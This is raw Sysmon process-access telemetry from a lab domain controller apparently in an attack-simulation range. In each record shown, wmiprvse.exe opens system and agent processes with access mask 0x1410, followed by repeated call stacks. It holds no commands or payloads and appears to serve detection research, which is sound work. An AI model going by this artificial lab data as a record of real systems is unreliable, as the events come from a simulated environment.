Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 